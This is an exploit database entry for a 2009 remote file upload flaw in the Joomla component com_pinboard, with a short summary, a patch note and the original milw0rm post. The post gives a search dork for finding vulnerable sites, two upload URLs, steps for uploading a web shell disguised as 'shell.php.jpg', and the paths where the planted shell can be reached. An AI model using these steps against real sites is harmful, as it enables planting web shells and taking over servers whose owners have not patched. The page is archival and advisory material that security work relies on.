header-logo
Suggest Exploit
vendor:
com_pinboard
by:
ViRuSMaN
7,5
CVSS
HIGH
Remote File Upload Vulnerability
264
CWE
Product Name: com_pinboard
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component [com_pinboard] Remote File Upload Vulnerability

A vulnerability exists in Joomla Component [com_pinboard] which allows an attacker to upload a malicious file on the target system. The attacker can exploit this vulnerability by using the following two URLs: 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload or 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm. After clicking on the photo in the top left corner, the attacker can upload a malicious file such as a shell.php.jpg and confirm it. The malicious file can then be accessed at target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg or target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version.
Source

Exploit-DB raw data:

##############################################################
|
|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
|
|    Author : ViRuSMaN
|
|    Contact : v-.m@live.com
|
|    Home : Islam-Attack.CoM , HackTeach.OrG
|
##############################################################
|
| Dork inurl:com_pinboard
|
| Exploite :
|
| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
|
|    or
|
| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
|
| [#] click on the photo in Top Of Left
|
| [#] upload your shell shell.php.jpg  &  Confirmer SVP
|
| [#] Pwd Your Shell
|  
|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
|
|      Or
|
|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
|
##############################################################
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's  
##############################################################

# milw0rm.com [2009-06-24]